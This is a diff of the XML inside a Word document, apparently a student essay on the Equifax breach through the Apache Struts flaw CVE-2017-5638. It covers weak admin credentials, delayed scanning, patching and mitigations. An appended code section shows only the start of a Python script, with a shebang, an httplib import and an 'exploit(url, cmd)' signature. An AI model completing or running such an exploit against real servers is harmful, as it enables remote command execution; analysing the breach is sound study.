@@ -1291,7 +1285,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>d combination was "admin/admin", a considerably weak username-password combination that can actually be the first guess that an attacker or attacker network would try in such an environment.</w:t>
+        <w:t xml:space="preserve">d combination was "admin/admin", a considerably weak username-password combination that can </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>be</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the first guess that an attacker or attacker network would try in such an environment.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1318,15 +1328,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Cisco's Talos security division </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">warned </w:t>
+        <w:t xml:space="preserve">Cisco's </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Talos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> security division warned </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1453,94 +1473,17 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:noProof/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">period </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>allowed for this controversy to cause a great uproar in the cybersecurity community.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Considering the information of the victims being at such a high target mixed with the even higher target of the company itself, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>the uproar is understandable.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Vulnerability scans performed by Equifax were reportedly observed on July 29</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:vertAlign w:val="superscript"/>
-        </w:rPr>
-        <w:t>th</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, five months after the official release of the vulnerability itself.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78C5ACF0" wp14:editId="665A6D6A">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78C5ACF0" wp14:editId="6E7929A1">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:align>right</wp:align>
             </wp:positionH>
-            <wp:positionV relativeFrom="page">
-              <wp:posOffset>923925</wp:posOffset>
+            <wp:positionV relativeFrom="margin">
+              <wp:align>top</wp:align>
             </wp:positionV>
             <wp:extent cx="2924175" cy="3451225"/>
             <wp:effectExtent l="0" t="0" r="9525" b="0"/>
@@ -1610,36 +1553,70 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The first steps in company mitigation should have been for scanning for vulnerabilities themselves. A five-month period spanning between vulnerability release and observation leads to believe that Equifax was in dire need of VM distribution over the manager admin interface</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> under a scheduled process</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>. After observation, the proper steps could have been taken to resolve the critical vulnerability</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>. An example of a vulnerability scanner is Tenable Nessus Enterprise.</w:t>
+        <w:t xml:space="preserve">period </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>allowed for this controversy to cause a great uproar in the cybersecurity community.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Considering the information of the victims being at such a high target mixed with the even higher target of the company itself, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>the uproar is understandable.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Vulnerability scans performed by Equifax were reportedly observed on July 29</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:vertAlign w:val="superscript"/>
+        </w:rPr>
+        <w:t>th</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, five months after the official release of the vulnerability itself.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1654,21 +1631,21 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D8BD222" wp14:editId="2D1AF972">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D8BD222" wp14:editId="28D3ACB2">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="margin">
                   <wp:align>right</wp:align>
                 </wp:positionH>
                 <wp:positionV relativeFrom="page">
-                  <wp:posOffset>4400550</wp:posOffset>
+                  <wp:posOffset>4448175</wp:posOffset>
                 </wp:positionV>
-                <wp:extent cx="2924175" cy="243840"/>
-                <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
+                <wp:extent cx="2924175" cy="533400"/>
+                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                 <wp:wrapTight wrapText="bothSides">
                   <wp:wrapPolygon edited="0">
                     <wp:start x="0" y="0"/>
-                    <wp:lineTo x="0" y="20250"/>
-                    <wp:lineTo x="21530" y="20250"/>
+                    <wp:lineTo x="0" y="20829"/>
+                    <wp:lineTo x="21530" y="20829"/>
                     <wp:lineTo x="21530" y="0"/>
                     <wp:lineTo x="0" y="0"/>
                   </wp:wrapPolygon>
@@ -1682,7 +1659,7 @@
                       <wps:spPr>
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="2924175" cy="243840"/>
+                          <a:ext cx="2924175" cy="533400"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1776,18 +1753,21 @@
                         <a:prstTxWarp prst="textNoShape">
                           <a:avLst/>
                         </a:prstTxWarp>
-                        <a:spAutoFit/>
+                        <a:noAutofit/>
                       </wps:bodyPr>
                     </wps:wsp>
                   </a:graphicData>
                 </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
               </wp:anchor>
             </w:drawing>
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="5D8BD222" id="Text Box 7" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:179.05pt;margin-top:346.5pt;width:230.25pt;height:19.2pt;z-index:-251646976;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:page;v-text-anchor:top" o:gfxdata="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" stroked="f">
-                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
+              <v:shape w14:anchorId="5D8BD222" id="Text Box 7" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:179.05pt;margin-top:350.25pt;width:230.25pt;height:42pt;z-index:-251646976;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:page;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox inset="0,0,0,0">
                   <w:txbxContent>
                     <w:p>
                       <w:pPr>
@@ -1877,40 +1857,31 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Following a proper, and consistent vulnerability scan, the next obvious state is to update the vulne</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">rable system. S2-045, created on Mar </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:vertAlign w:val="superscript"/>
-        </w:rPr>
-        <w:t>nd</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, 2017 is the currently publicly available patch for such a system. </w:t>
+        <w:t>The first steps in company mitigation should have been for scanning for vulnerabilities themselves. A five-month period spanning between vulnerability release and observation leads to believe that Equifax was in dire need of VM distribution over the manager admin interface</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> under a scheduled process</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>. After observation, the proper steps could have been taken to resolve the critical vulnerability</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>. An example of a vulnerability scanner is Tenable Nessus Enterprise.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1929,31 +1900,40 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Mitigations to the vulnerability exist prior to the released patch however.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Additionally, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>temporary restricted access to policy managing administrator privileges until a fix is implemented could have potentially limited any unwarranted access to the system.</w:t>
+        <w:t>Following a proper, and consistent vulnerability scan, the next obvious state is to update the vulne</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rable system. S2-045, created on Mar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:vertAlign w:val="superscript"/>
+        </w:rPr>
+        <w:t>nd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, 2017 is the currently publicly available patch for such a system. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1972,23 +1952,50 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Early research and development to a patch allows for quicker response to damage as well. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Equifax could have prevented </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>the</w:t>
+        <w:t>Mitigations to the vulnerability exist prior to the released patch however.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Additionally, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>temporary restricted access to policy managing administrator privileges until a fix is implemented could have potentially limited any unwarranted access to the system.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Early research and development to a patch allows for quicker response to damage as well. Equifax could have prevented the</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2405,6 +2412,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2412,8 +2420,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2524,23 +2530,49 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>for the company as well</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>as Equifax basically has fallen, but will very little consequences</w:t>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>or the company</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">as Equifax basically has </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>fallen, but</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> will very little consequences</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2581,25 +2613,14 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Resources</w:t>
       </w:r>
     </w:p>
@@ -2771,7 +2792,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Kircher@4evrmalone, Madison Malone. “Turns Out That Equifax Hack Was Even Worse Than We Thought.” </w:t>
+        <w:t xml:space="preserve">Madison Malone. “Turns Out That Equifax Hack Was Even Worse Than We Thought.” </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3136,14 +3157,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">“You Are Viewing This Page in an Unauthorized Frame Window.” </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:i/>
           <w:iCs/>
           <w:sz w:val="20"/>
@@ -3151,14 +3164,34 @@
         </w:rPr>
         <w:t>NVD - Cve-2017-5638</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, nvd.nist.gov/vuln/detail/CVE-2017-5638. </w:t>
-      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, nvd.nist.gov/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>vuln</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/detail/CVE-2017-5638. </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3247,13 +3280,33 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>#!/usr/bin/python</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#!/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/bin/python</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3351,6 +3404,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -3359,6 +3413,7 @@
         </w:rPr>
         <w:t>httplib</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3421,13 +3476,51 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>exploit(url, cmd):</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>exploit(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
